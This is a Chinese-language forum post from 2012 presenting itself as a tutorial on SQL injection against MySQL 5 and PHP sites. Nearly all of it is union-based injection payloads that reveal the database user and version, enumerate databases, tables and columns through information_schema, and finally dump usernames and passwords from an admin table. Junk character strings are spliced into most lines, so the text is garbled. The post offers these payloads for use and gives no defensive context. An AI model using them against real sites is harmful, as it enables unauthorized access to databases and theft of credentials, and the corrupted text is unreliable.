* |6 h" W- n6 E; F: p# e- f4 }教程内容:Mysql 5+php 注入
9 N7 ]4 |& P; O/ N
& L2 \# P: b* ]
* m# J3 \- X o/ f( E
" K% `$ u% w! J一.查看MYSQL基本信息(库名,版本,用户), }4 E# P% k' \' ~- H
" @8 a& M5 t5 t0 vand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*" }5 C, o9 O% `/ r% W
3 G$ F! J) L! x7 V
二.查数据库
" H" T. p( ?) `2 [
% r4 M; }: |; @) l4 K3 b5 ^and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
! A' X7 R" g5 ?7 p& Mlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
0 q, z7 q5 d o9 X* @) _& F& ]
. o$ A6 P/ X2 Y9 k* T" Y& e三.暴表7 a* t: Y+ m% E0 N
3 Z. F1 i1 x' }8 Band 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*; A- j) ~# L8 t8 u4 \* H! o
' h) w4 W* n0 R) ^$ z8 ?
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
0 p) ~$ ?7 k- }7 M9 Y2 u* V
1 p+ c8 V' ]! C. I9 ^; e) j四.暴字段9 o* Z: i& V; i" M1 w, R# s
; d* l% \, F8 d$ c% s
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*: p# x) H$ d. k0 V+ D% K
) u1 g) G. J- e7 l, ^, F- Qlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。2 Y: [# l, Y/ ]; H
' y5 t. o6 ~) r五.暴数据
! ~9 @& a: ]" g* c( c. J0 ^6 ~5 O7 ]: k. i1 C) A8 @
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*5 `& l* h5 l2 q
6 g$ K; \- b8 ]+ o
9 i' D9 v9 N2 E6 @3 c! }: l; m R: \' J这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
- \, { x$ x. d9 C1 {' z |
发表于 2012-9-13 16:27:53
收藏
分享
支持
反对